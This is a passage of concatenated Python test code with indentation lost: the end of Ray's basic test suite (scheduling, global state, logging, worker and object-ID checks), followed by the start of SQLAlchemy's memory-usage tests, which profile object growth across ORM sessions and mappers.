ray.get([_sleep.remote(i) for i in range(10)])
ray.get(sleep.remote())
def test_max_call_tasks(shutdown_only):
ray.init(num_cpus=1)
@ray.remote(max_calls=1)
def f():
return os.getpid()
pid = ray.get(f.remote())
ray.tests.utils.wait_for_pid_to_exit(pid)
@ray.remote(max_calls=2)
def f():
return os.getpid()
pid1 = ray.get(f.remote())
pid2 = ray.get(f.remote())
assert pid1 == pid2
ray.tests.utils.wait_for_pid_to_exit(pid1)
def attempt_to_load_balance(remote_function,
args,
total_tasks,
num_nodes,
minimum_count,
num_attempts=100):
attempts = 0
while attempts < num_attempts:
locations = ray.get(
[remote_function.remote(*args) for _ in range(total_tasks)])
names = set(locations)
counts = [locations.count(name) for name in names]
logger.info("Counts are {}.".format(counts))
if (len(names) == num_nodes
and all(count >= minimum_count for count in counts)):
break
attempts += 1
assert attempts < num_attempts
def test_load_balancing(ray_start_cluster):
# This test ensures that tasks are being assigned to all local
# schedulers in a roughly equal manner.
cluster = ray_start_cluster
num_nodes = 3
num_cpus = 7
for _ in range(num_nodes):
cluster.add_node(num_cpus=num_cpus)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f():
time.sleep(0.01)
return ray.worker.global_worker.plasma_client.store_socket_name
attempt_to_load_balance(f, [], 100, num_nodes, 10)
attempt_to_load_balance(f, [], 1000, num_nodes, 100)
def test_load_balancing_with_dependencies(ray_start_cluster):
# This test ensures that tasks are being assigned to all local
# schedulers in a roughly equal manner even when the tasks have
# dependencies.
cluster = ray_start_cluster
num_nodes = 3
for _ in range(num_nodes):
cluster.add_node(num_cpus=1)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
time.sleep(0.010)
return ray.worker.global_worker.plasma_client.store_socket_name
# This object will be local to one of the local schedulers. Make sure
# this doesn't prevent tasks from being scheduled on other local
# schedulers.
x = ray.put(np.zeros(1000000))
attempt_to_load_balance(f, [x], 100, num_nodes, 25)
def wait_for_num_tasks(num_tasks, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.task_table()) >= num_tasks:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
def wait_for_num_objects(num_objects, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.object_table()) >= num_objects:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_global_state_api(shutdown_only):
with pytest.raises(Exception):
ray.global_state.object_table()
with pytest.raises(Exception):
ray.global_state.task_table()
with pytest.raises(Exception):
ray.global_state.client_table()
with pytest.raises(Exception):
ray.global_state.function_table()
ray.init(num_cpus=5, num_gpus=3, resources={"CustomResource": 1})
resources = {"CPU": 5, "GPU": 3, "CustomResource": 1}
assert ray.global_state.cluster_resources() == resources
assert ray.global_state.object_table() == {}
driver_id = ray.experimental.state.binary_to_hex(
ray.worker.global_worker.worker_id)
driver_task_id = ray.worker.global_worker.current_task_id.hex()
# One task is put in the task table which corresponds to this driver.
wait_for_num_tasks(1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1
assert driver_task_id == list(task_table.keys())[0]
task_spec = task_table[driver_task_id]["TaskSpec"]
nil_id_hex = ray.ObjectID.nil().hex()
assert task_spec["TaskID"] == driver_task_id
assert task_spec["ActorID"] == nil_id_hex
assert task_spec["Args"] == []
assert task_spec["DriverID"] == driver_id
assert task_spec["FunctionID"] == nil_id_hex
assert task_spec["ReturnObjectIDs"] == []
client_table = ray.global_state.client_table()
node_ip_address = ray.worker.global_worker.node_ip_address
assert len(client_table) == 1
assert client_table[0]["NodeManagerAddress"] == node_ip_address
@ray.remote
def f(*xs):
return 1
x_id = ray.put(1)
result_id = f.remote(1, "hi", x_id)
# Wait for one additional task to complete.
wait_for_num_tasks(1 + 1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1 + 1
task_id_set = set(task_table.keys())
task_id_set.remove(driver_task_id)
task_id = list(task_id_set)[0]
function_table = ray.global_state.function_table()
task_spec = task_table[task_id]["TaskSpec"]
assert task_spec["ActorID"] == nil_id_hex
assert task_spec["Args"] == [1, "hi", x_id]
assert task_spec["DriverID"] == driver_id
assert task_spec["ReturnObjectIDs"] == [result_id]
function_table_entry = function_table[task_spec["FunctionID"]]
assert function_table_entry["Name"] == "ray.tests.test_basic.f"
assert function_table_entry["DriverID"] == driver_id
assert function_table_entry["Module"] == "ray.tests.test_basic"
assert task_table[task_id] == ray.global_state.task_table(task_id)
# Wait for two objects, one for the x_id and one for result_id.
wait_for_num_objects(2)
def wait_for_object_table():
timeout = 10
start_time = time.time()
while time.time() - start_time < timeout:
object_table = ray.global_state.object_table()
tables_ready = (object_table[x_id]["ManagerIDs"] is not None and
object_table[result_id]["ManagerIDs"] is not None)
if tables_ready:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for object table to "
"update.")
object_table = ray.global_state.object_table()
assert len(object_table) == 2
assert object_table[x_id]["IsEviction"][0] is False
assert object_table[result_id]["IsEviction"][0] is False
assert object_table[x_id] == ray.global_state.object_table(x_id)
object_table_entry = ray.global_state.object_table(result_id)
assert object_table[result_id] == object_table_entry
# TODO(rkn): Pytest actually has tools for capturing stdout and stderr, so we
# should use those, but they seem to conflict with Ray's use of faulthandler.
class CaptureOutputAndError(object):
"""Capture stdout and stderr of some span.
This can be used as follows.
captured = {}
with CaptureOutputAndError(captured):
# Do stuff.
# Access captured["out"] and captured["err"].
"""
def __init__(self, captured_output_and_error):
if sys.version_info >= (3, 0):
import io
self.output_buffer = io.StringIO()
self.error_buffer = io.StringIO()
else:
import cStringIO
self.output_buffer = cStringIO.StringIO()
self.error_buffer = cStringIO.StringIO()
self.captured_output_and_error = captured_output_and_error
def __enter__(self):
sys.stdout.flush()
sys.stderr.flush()
self.old_stdout = sys.stdout
self.old_stderr = sys.stderr
sys.stdout = self.output_buffer
sys.stderr = self.error_buffer
def __exit__(self, exc_type, exc_value, traceback):
sys.stdout.flush()
sys.stderr.flush()
sys.stdout = self.old_stdout
sys.stderr = self.old_stderr
self.captured_output_and_error["out"] = self.output_buffer.getvalue()
self.captured_output_and_error["err"] = self.error_buffer.getvalue()
def test_logging_to_driver(shutdown_only):
ray.init(num_cpus=1, log_to_driver=True)
@ray.remote
def f():
# It's important to make sure that these print statements occur even
# without calling sys.stdout.flush() and sys.stderr.flush().
for i in range(100):
print(i)
print(100 + i, file=sys.stderr)
captured = {}
with CaptureOutputAndError(captured):
ray.get(f.remote())
time.sleep(1)
output_lines = captured["out"]
for i in range(200):
assert str(i) in output_lines
error_lines = captured["err"]
assert len(error_lines) == 0
def test_not_logging_to_driver(shutdown_only):
ray.init(num_cpus=1, log_to_driver=False)
@ray.remote
def f():
for i in range(100):
print(i)
print(100 + i, file=sys.stderr)
sys.stdout.flush()
sys.stderr.flush()
captured = {}
with CaptureOutputAndError(captured):
ray.get(f.remote())
time.sleep(1)
output_lines = captured["out"]
assert len(output_lines) == 0
error_lines = captured["err"]
assert len(error_lines) == 0
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_workers(shutdown_only):
num_workers = 3
ray.init(num_cpus=num_workers)
@ray.remote
def f():
return id(ray.worker.global_worker), os.getpid()
# Wait until all of the workers have started.
worker_ids = set()
while len(worker_ids) != num_workers:
worker_ids = set(ray.get([f.remote() for _ in range(10)]))
worker_info = ray.global_state.workers()
assert len(worker_info) >= num_workers
for worker_id, info in worker_info.items():
assert "node_ip_address" in info
assert "plasma_store_socket" in info
assert "stderr_file" in info
assert "stdout_file" in info
def test_specific_driver_id():
dummy_driver_id = ray.DriverID(b"00112233445566778899")
ray.init(num_cpus=1, driver_id=dummy_driver_id)
# in driver
assert dummy_driver_id == ray._get_runtime_context().current_driver_id
# in worker
@ray.remote
def f():
return ray._get_runtime_context().current_driver_id
assert dummy_driver_id == ray.get(f.remote())
ray.shutdown()
def test_object_id_properties():
id_bytes = b"00112233445566778899"
object_id = ray.ObjectID(id_bytes)
assert object_id.binary() == id_bytes
object_id = ray.ObjectID.nil()
assert object_id.is_nil()
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(id_bytes + b"1234")
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(b"0123456789")
object_id = ray.ObjectID(_random_string())
assert not object_id.is_nil()
assert object_id.binary() != id_bytes
id_dumps = pickle.dumps(object_id)
id_from_dumps = pickle.loads(id_dumps)
assert id_from_dumps == object_id
@pytest.fixture
def shutdown_only_with_initialization_check():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
assert not ray.is_initialized()
def test_initialized(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0)
assert ray.is_initialized()
def test_initialized_local_mode(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0, local_mode=True)
assert ray.is_initialized()
def test_wait_reconstruction(shutdown_only):
ray.init(num_cpus=1, object_store_memory=10**8)
@ray.remote
def f():
return np.zeros(6 * 10**7, dtype=np.uint8)
x_id = f.remote()
ray.wait([x_id])
ray.wait([f.remote()])
assert not ray.worker.global_worker.plasma_client.contains(
ray.pyarrow.plasma.ObjectID(x_id.binary()))
ready_ids, _ = ray.wait([x_id])
assert len(ready_ids) == 1
def test_ray_setproctitle(shutdown_only):
ray.init(num_cpus=2)
@ray.remote
class UniqueName(object):
def __init__(self):
assert setproctitle.getproctitle() == "ray_UniqueName:__init__()"
def f(self):
assert setproctitle.getproctitle() == "ray_UniqueName:f()"
@ray.remote
def unique_1():
assert setproctitle.getproctitle(
) == "ray_worker:ray.tests.test_basic.unique_1()"
actor = UniqueName.remote()
ray.get(actor.f.remote())
ray.get(unique_1.remote())
def test_duplicate_error_messages(shutdown_only):
ray.init(num_cpus=0)
driver_id = ray.DriverID.nil()
error_data = ray.gcs_utils.construct_error_message(driver_id, "test",
"message", 0)
# Push the same message to the GCS twice (they are the same because we
# do not include a timestamp).
r = ray.worker.global_worker.redis_client
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id.binary(),
error_data)
# Before https://github.com/ray-project/ray/pull/3316 this would
# give an error
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id.binary(),
error_data)
@pytest.mark.skipif(
os.getenv("TRAVIS") is None,
reason="This test should only be run on Travis.")
def test_ray_stack(shutdown_only):
ray.init(num_cpus=2)
def unique_name_1():
time.sleep(1000)
@ray.remote
def unique_name_2():
time.sleep(1000)
@ray.remote
def unique_name_3():
unique_name_1()
unique_name_2.remote()
unique_name_3.remote()
success = False
start_time = time.time()
while time.time() - start_time < 30:
# Attempt to parse the "ray stack" call.
output = ray.utils.decode(subprocess.check_output(["ray", "stack"]))
if ("unique_name_1" in output and "unique_name_2" in output
and "unique_name_3" in output):
success = True
break
if not success:
raise Exception("Failed to find necessary information with "
"'ray stack'")
def test_pandas_parquet_serialization():
# Only test this if pandas is installed
pytest.importorskip("pandas")
import pandas as pd
import pyarrow as pa
import pyarrow.parquet as pq
tempdir = tempfile.mkdtemp()
filename = os.path.join(tempdir, "parquet-test")
pd.DataFrame({"col1": [0, 1], "col2": [0, 1]}).to_parquet(filename)
with open(os.path.join(tempdir, "parquet-compression"), "wb") as f:
table = pa.Table.from_arrays([pa.array([1, 2, 3])], ["hello"])
pq.write_table(table, f, compression="lz4")
# Clean up
shutil.rmtree(tempdir)
def test_socket_dir_not_existing(shutdown_only):
random_name = ray.ObjectID(_random_string()).hex()
temp_raylet_socket_dir = "/tmp/ray/tests/{}".format(random_name)
temp_raylet_socket_name = os.path.join(temp_raylet_socket_dir,
"raylet_socket")
ray.init(num_cpus=1, raylet_socket_name=temp_raylet_socket_name)
def test_raylet_is_robust_to_random_messages(shutdown_only):
ray.init(num_cpus=1)
node_manager_address = None
node_manager_port = None
for client in ray.global_state.client_table():
if "NodeManagerAddress" in client:
node_manager_address = client["NodeManagerAddress"]
node_manager_port = client["NodeManagerPort"]
assert node_manager_address
assert node_manager_port
# Try to bring down the node manager:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((node_manager_address, node_manager_port))
s.send(1000 * b'asdf')
@ray.remote
def f():
return 1
assert ray.get(f.remote()) == 1
def test_non_ascii_comment(ray_start):
@ray.remote
def f():
# 日本語 Japanese comment
return 1
assert ray.get(f.remote()) == 1
@ray.remote
def echo(x):
return x
@ray.remote
class WithConstructor(object):
def __init__(self, data):
self.data = data
def get_data(self):
return self.data
@ray.remote
class WithoutConstructor(object):
def set_data(self, data):
self.data = data
def get_data(self):
return self.data
class BaseClass(object):
def __init__(self, data):
self.data = data
def get_data(self):
return self.data
@ray.remote
class DerivedClass(BaseClass):
def __init__(self, data):
# Due to different behaviors of super in Python 2 and Python 3,
# we use BaseClass directly here.
BaseClass.__init__(self, data)
def test_load_code_from_local(shutdown_only):
ray.init(load_code_from_local=True, num_cpus=4)
message = "foo"
# Test normal function.
assert ray.get(echo.remote(message)) == message
# Test actor class with constructor.
actor = WithConstructor.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test actor class without constructor.
actor = WithoutConstructor.remote()
actor.set_data.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test derived actor class.
actor = DerivedClass.remote(1)
assert ray.get(actor.get_data.remote()) == 1
# Test using ray.remote decorator on raw classes.
base_actor_class = ray.remote(num_cpus=1)(BaseClass)
base_actor = base_actor_class.remote(message)
assert ray.get(base_actor.get_data.remote()) == message
|
test_memusage.py
|
import decimal
import gc
import itertools
import multiprocessing
import weakref
import sqlalchemy as sa
from sqlalchemy import ForeignKey
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import testing
from sqlalchemy import Unicode
from sqlalchemy import util
from sqlalchemy.orm import aliased
from sqlalchemy.orm import clear_mappers
from sqlalchemy.orm import configure_mappers
from sqlalchemy.orm import create_session
from sqlalchemy.orm import join as orm_join
from sqlalchemy.orm import joinedload
from sqlalchemy.orm import Load
from sqlalchemy.orm import mapper
from sqlalchemy.orm import relationship
from sqlalchemy.orm import selectinload
from sqlalchemy.orm import Session
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm import subqueryload
from sqlalchemy.orm.mapper import _mapper_registry
from sqlalchemy.orm.session import _sessions
from sqlalchemy.processors import to_decimal_processor_factory
from sqlalchemy.processors import to_unicode_processor_factory
from sqlalchemy.sql import column
from sqlalchemy.sql import util as sql_util
from sqlalchemy.sql.visitors import cloned_traverse
from sqlalchemy.sql.visitors import replacement_traverse
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.fixtures import fixture_session
from sqlalchemy.testing.schema import Column
from sqlalchemy.testing.schema import Table
from sqlalchemy.testing.util import gc_collect
from ..orm import _fixtures
class A(fixtures.ComparableEntity):
pass
class B(fixtures.ComparableEntity):
pass
class ASub(A):
pass
def assert_cycles(expected=0):
def decorate(fn):
def go():
fn() # warmup, configure mappers, caches, etc.
gc_collect()
gc_collect()
gc_collect() # multiple calls seem to matter
# gc.set_debug(gc.DEBUG_COLLECTABLE)
try:
return fn() # run for real
finally:
unreachable = gc_collect()
assert unreachable <= expected
gc_collect()
return go
return decorate
def profile_memory(
maxtimes=250, assert_no_sessions=True, get_num_objects=None
):
def decorate(func):
# run the test N times. if length of gc.get_objects()
# keeps growing, assert false
def get_objects_skipping_sqlite_issue():
# pysqlite keeps adding weakref objects which only
# get reset after 220 iterations. We'd like to keep these
# tests under 50 iterations and ideally about ten, so
# just filter them out so that we get a "flatline" more quickly.
if testing.against("sqlite+pysqlite"):
return [
o
for o in gc.get_objects()
if not isinstance(o, weakref.ref)
]
else:
return gc.get_objects()
def profile(queue, func_args):
# give testing.db a brand new pool and don't
# touch the existing pool, since closing a socket
# in the subprocess can affect the parent
testing.db.pool = testing.db.pool.recreate()
gc_collect()
samples = []
max_ = 0
max_grew_for = 0
success = False
until_maxtimes = 0
try:
while True:
if until_maxtimes >= maxtimes // 5:
break
for x in range(5):
try:
func(*func_args)
except Exception as err:
queue.put(
(
"result",
False,
"Test raised an exception: %r" % err,
)
)
raise
gc_collect()
samples.append(
get_num_objects()
if get_num_objects is not None
else len(get_objects_skipping_sqlite_issue())
)
if assert_no_sessions:
assert len(_sessions) == 0, "%d sessions remain" % (
len(_sessions),
)
# queue.put(('samples', samples))
latest_max = max(samples[-5:])
if latest_max > max_:
queue.put(
(
"status",
"Max grew from %s to %s, max has "
"grown for %s samples"
% (max_, latest_max, max_grew_for),
)
)
max_ = latest_max
max_grew_for += 1
until_maxtimes += 1
continue
else:
queue.put(
(
"status",
"Max remained at %s, %s more attempts left"
% (max_, max_grew_for),
)
)
max_grew_for -= 1
if max_grew_for == 0:
success = True
break
except Exception as err:
queue.put(("result", False, "got exception: %s" % err))
else:
if not success:
queue.put(
(
"result",
False,
"Ran for a total of %d times, memory kept "
"growing: %r" % (maxtimes, samples),
)
)
else:
queue.put(("result", True, "success"))
def run_plain(*func_args):
import queue as _queue
q = _queue.Queue()
profile(q, func_args)
while True:
row = q.get()
typ = row[0]
if typ == "samples":
print("sample gc sizes:", row[1])
elif typ == "status":
print(row[1])
elif typ == "result":
break
else:
assert False, "can't parse row"
assert row[1], row[2]
# return run_plain
def run_in_process(*func_args):
queue = multiprocessing.Queue()
proc = multiprocessing.Process(
target=profile, args=(queue, func_args)
)
proc.start()
while True:
row = queue.get()
typ = row[0]
if typ == "samples":
print("sample gc sizes:", row[1])
elif typ == "status":
print(row[1])
elif typ == "result":
break
else:
assert False, "can't parse row"
proc.join()
assert row[1], row[2]
return run_in_process
return decorate
def assert_no_mappers():
clear_mappers()
gc_collect()
assert len(_mapper_registry) == 0
class EnsureZeroed(fixtures.ORMTest):
def setup(self):
_sessions.clear()
_mapper_registry.clear()
# enable query caching, however make the cache small so that
# the tests don't take too long. issues w/ caching include making
# sure sessions don't get stuck inside of it. However it will
# make tests like test_mapper_reset take a long time because mappers
# are very much a part of what's in the cache.
self.engine = engines.testing_engine(
options={"use_reaper": False, "query_cache_size": 10}
)
class MemUsageTest(EnsureZeroed):
__tags__ = ("memory_intensive",)
__requires__ = ("cpython", "no_windows")
def test_type_compile(self):
from sqlalchemy.dialects.sqlite.base import dialect as SQLiteDialect
cast = sa.cast(column("x"), sa.Integer)
@profile_memory()
def go():
dialect = SQLiteDialect()
cast.compile(dialect=dialect)
go()
@testing.requires.cextensions
def test_DecimalResultProcessor_init(self):
@profile_memory()
def go():
to_decimal_processor_factory({}, 10)
go()
@testing.requires.cextensions
def test_DecimalResultProcessor_process(self):
@profile_memory()
def go():
to_decimal_processor_factory(decimal.Decimal, 10)(1.2)
go()
@testing.requires.cextensions
def test_UnicodeResultProcessor_init(self):
@profile_memory()
def go():
to_unicode_processor_factory("utf8")
go()
def test_ad_hoc_types(self):
"""test storage of bind processors, result processors
in dialect-wide registry."""
from sqlalchemy.dialects import mysql, postgresql, sqlite
from sqlalchemy import types
eng = engines.testing_engine()
for args in (
(types.Integer,),
(types.String,),
(types.PickleType,),
(types.Enum, "a", "b", "c"),
(sqlite.DATETIME,),
(postgresql.ENUM, "a", "b", "c"),
(types.Interval,),
(postgresql.INTERVAL,),
(mysql.VARCHAR,),
):
@profile_memory()
def go():
type_ = args[0](*args[1:])
bp = type_._cached_bind_processor(eng.dialect)
rp = type_._cached_result_processor(eng.dialect, 0)
bp, rp # strong reference
go()
assert not eng.dialect._type_memos
@testing.fails()
def test_fixture_failure(self):
class Foo(object):
pass
stuff = []
@profile_memory(maxtimes=20)
def go():
stuff.extend(Foo() for i in range(100))
go()
class MemUsageWBackendTest(EnsureZeroed):
__tags__ = ("memory_intensive",)
__requires__ = "cpython", "memory_process_intensive"
__sparse_backend__ = True
# ensure a pure growing test trips the assertion
@testing.fails_if(lambda: True)
def test_fixture(self):
class Foo(object):
pass
x = []
@profile_memory(maxtimes=10)
def go():
x[-1:] = [Foo(), Foo(), Foo(), Foo(), Foo(), Foo()]
go()
def test_session(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
Column("col3", Integer, ForeignKey("mytable.col1")),
)
metadata.create_all(self.engine)
m1 = mapper(
A,
table1,
properties={
"bs": relationship(
B, cascade="all, delete", order_by=table2.c.col1
)
},
)
m2 = mapper(B, table2)
@profile_memory()
def go():
with Session(self.engine) as sess:
a1 = A(col2="a1")
a2 = A(col2="a2")
a3 = A(col2="a3")
a1.bs.append(B(col2="b1"))
a1.bs.append(B(col2="b2"))
a3.bs.append(B(col2="b3"))
for x in [a1, a2, a3]:
sess.add(x)
sess.commit()
alist = sess.query(A).order_by(A.col1).all()
eq_(
[
A(col2="a1", bs=[B(col2="b1"), B(col2="b2")]),
A(col2="a2", bs=[]),
A(col2="a3", bs=[B(col2="b3")]),
],
alist,
)
for a in alist:
sess.delete(a)
sess.commit()
go()
metadata.drop_all(self.engine)
del m1, m2
assert_no_mappers()
def test_sessionmaker(self):
@profile_memory()
def go():
sessmaker = sessionmaker(bind=self.engine)
sess = sessmaker()
r = sess.execute(select(1))
r.close()
sess.close()
del sess
del sessmaker
go()
@testing.emits_warning("Compiled statement cache for mapper.*")
@testing.emits_warning("Compiled statement cache for lazy loader.*")
@testing.crashes("sqlite", ":memory: connection not suitable here")
def test_orm_many_engines(self):
metadata = MetaData(self.engine)
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
Column("col3", Integer, ForeignKey("mytable.col1")),
)
metadata.create_all()
m1 = mapper(
A,
table1,
properties={
"bs": relationship(
B, cascade="all, delete", order_by=table2.c.col1
)
},
_compiled_cache_size=50,
)
m2 = mapper(B, table2, _compiled_cache_size=50)
@profile_memory()
def go():
engine = engines.testing_engine(
options={
"logging_name": "FOO",
"pool_logging_name": "BAR",
"use_reaper": False,
}
)
with Session(engine) as sess:
a1 = A(col2="a1")
a2 = A(col2="a2")
a3 = A(col2="a3")
a1.bs.append(B(col2="b1"))
a1.bs.append(B(col2="b2"))
a3.bs.append(B(col2="b3"))
for x in [a1, a2, a3]:
sess.add(x)
sess.commit()
alist = sess.query(A).order_by(A.col1).all()
eq_(
[
A(col2="a1", bs=[B(col2="b1"), B(col2="b2")]),
A(col2="a2", bs=[]),
A(col2="a3", bs=[B(col2="b3")]),
],
alist,
)
for a in alist:
sess.delete(a)
sess.commit()
engine.dispose()
go()
metadata.drop_all()
del m1, m2
assert_no_mappers()
@testing.emits_warning("Compiled statement cache for.*")
def test_many_updates(self):
metadata = MetaData()
wide_table = Table(
"t",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
*[Column("col%d" % i, Integer) for i in range(10)]
)
class Wide(object):
pass
mapper(Wide, wide_table, _compiled_cache_size=10)
metadata.create_all(self.engine)
with Session(self.engine) as session:
w1 = Wide()
session.add(w1)
session.commit()
del session
counter = [1]
@profile_memory()
def go():
with Session(self.engine) as session:
w1 = session.query(Wide).first()
x = counter[0]
dec = 10
while dec > 0:
# trying to count in binary here,
# works enough to trip the test case
if pow(2, dec) < x:
setattr(w1, "col%d" % dec, counter[0])
x -= pow(2, dec)
dec -= 1
session.commit()
counter[0] += 1
try:
go()
finally:
metadata.drop_all(self.engine)
@testing.requires.savepoints
@testing.provide_metadata
def test_savepoints(self):
metadata = self.metadata
some_table = Table(
"t",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
)
class SomeClass(object):
pass
mapper(SomeClass, some_table)
metadata.create_all()
session = Session(testing.db)
target_strings = (
session.connection().dialect.identifier_preparer._strings
)
session.close()
@profile_memory(
assert_no_sessions=False,
get_num_objects=lambda: len(target_strings),
)
def go():
session = Session(testing.db)
with session.transaction:
sc = SomeClass()
session.add(sc)
with session.begin_nested():
session.query(SomeClass).first()
go()
@testing.crashes("mysql+cymysql", "blocking")
def test_unicode_warnings(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", Unicode(30)),
)
metadata.create_all(self.engine)
i = [1]
# the times here is cranked way up so that we can see
# pysqlite clearing out its internal buffer and allow
# the test to pass
@testing.emits_warning()
@profile_memory()
def go():
# execute with a non-unicode object. a warning is emitted,
# this warning shouldn't clog up memory.
with self.engine.connect() as conn:
conn.execute(
table1.select().where(table1.c.col2 == "foo%d" % i[0])
)
i[0] += 1
try:
go()
finally:
metadata.drop_all(self.engine)
def test_warnings_util(self):
counter = itertools.count()
import warnings
warnings.filterwarnings("ignore", "memusage warning.*")
@profile_memory()
def go():
util.warn_limited(
"memusage warning, param1: %s, param2: %s",
(next(counter), next(counter)),
)
go()
def test_mapper_reset(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
Column("col3", Integer, ForeignKey("mytable.col1")),
)
@profile_memory()
def go():
mapper(
A,
table1,
properties={"bs": relationship(B, order_by=table2.c.col1)},
)
mapper(B, table2)
sess = create_session(self.engine)
a1 = A(col2="a1")
a2 = A(col2="a2")
a3 = A(col2="a3")
a1.bs.append(B(col2="b1"))
a1.bs.append(B(col2="b2"))
a3.bs.append(B(col2="b3"))
for x in [a1, a2, a3]:
sess.add(x)
sess.flush()
sess.expunge_all()
alist = sess.query(A).order_by(A.col1).all()
eq_(
[
A(col2="a1", bs=[B(col2="b1"), B(col2="b2")]),
A(col2="a2", bs=[]),
A(col2="a3", bs=[B(col2="b3")]),
],
alist,
)
for a in alist:
sess.delete(a)
sess.flush()
sess.close()
clear_mappers()
metadata.create_all(self.engine)
try:
go()
finally:
metadata.drop_all(self.engine)
assert_no_mappers()
def test_alias_pathing(self):
metadata = MetaData()
a = Table(
"a",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("bid", Integer, ForeignKey("b.id")),
Column("type", String(30)),
)
asub = Table(
"asub",
metadata,
Column("id", Integer, ForeignKey("a.id"), primary_key=True),
Column("data", String(30)),
)
b = Table(
"b",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
)
mapper(A, a, polymorphic_identity="a", polymorphic_on=a.c.type)
mapper(ASub, asub, inherits=A, polymorphic_identity="asub")
mapper(B, b, properties={"as_": relationship(A)})
metadata.create_all(self.engine)
sess = Session(self.engine)
a1 = ASub(data="a1")
a2 = ASub(data="a2")
a3 = ASub(data="a3")
b1 = B(as_=[a1, a2, a3])
sess.add(b1)
sess.commit()
del sess
# sqlite has a slow enough growth here
# that we have to run it more times to see the
# "dip" again
@profile_memory(maxtimes=120)
def go():
sess = Session(self.engine)
sess.query(B).options(subqueryload(B.as_.of_type(ASub))).all()
sess.close()
del sess
try:
go()
finally:
metadata.drop_all(self.engine)
clear_mappers()
def test_path_registry(self):
metadata = MetaData()
a = Table(
"a",
metadata,
Column("id", Integer, primary_key=True),
Column("foo", Integer),
Column("bar", Integer),
)
b = Table(
"b",
metadata,
Column("id", Integer, primary_key=True),
Column("a_id", ForeignKey("a.id")),
)
m1 = mapper(A, a, properties={"bs": relationship(B)})
mapper(B, b)
@profile_memory()
def go():
ma = sa.inspect(aliased(A))
m1._path_registry[m1.attrs.bs][ma][m1.attrs.bar]
go()
clear_mappers()
def test_with_inheritance(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
ForeignKey("mytable.col1"),
primary_key=True,
test_needs_autoincrement=True,
),
Column("col3", String(30)),
)
@profile_memory()
def go():
class A(fixtures.ComparableEntity):
pass
class B(A):
pass
mapper(
A,
table1,
polymorphic_on=table1.c.col2,
polymorphic_identity="a",
)
mapper(B, table2, inherits=A, polymorphic_identity="b")
sess = create_session(self.engine)
a1 = A()
a2 = A()
b1 = B(col3="b1")
b2 = B(col3="b2")
for x in [a1, a2, b1, b2]:
sess.add(x)
sess.flush()
sess.expunge_all()
alist = sess.query(A).order_by(A.col1).all()
eq_([A(), A(), B(col3="b1"), B(col3="b2")], alist)
for a in alist:
sess.delete(a)
sess.flush()
# don't need to clear_mappers()
del B
del A
metadata.create_all(self.engine)
try:
go()
finally:
metadata.drop_all(self.engine)
assert_no_mappers()
def test_with_manytomany(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table3 = Table(
"t1tot2",
metadata,
Column("t1", Integer, ForeignKey("mytable.col1")),
Column("t2", Integer, ForeignKey("mytable2.col1")),
)
@profile_memory()
def go():
class A(fixtures.ComparableEntity):
pass
